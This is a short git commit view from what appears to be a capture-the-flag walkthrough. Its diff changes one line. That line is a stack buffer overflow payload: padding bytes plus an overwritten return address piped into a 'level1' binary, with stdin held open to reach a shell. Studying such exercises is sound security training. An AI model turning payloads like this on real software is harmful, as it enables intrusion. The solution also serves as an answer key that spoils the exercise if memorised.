fix: bunch of improvements and typos in the walkthrough

This commit is contained in:
0x35c
2025-05-07 14:04:04 +02:00
parent ca011b34f4
commit fb1ba7aee8
11 changed files with 35 additions and 24 deletions

View File

@ -1 +1 @@
(python -c 'print("a"*76 + "\x44\x84\x04\x08")'; cat) | ./level1
(python -c 'print("A"*76 + "\x44\x84\x04\x08")'; cat) | ./level1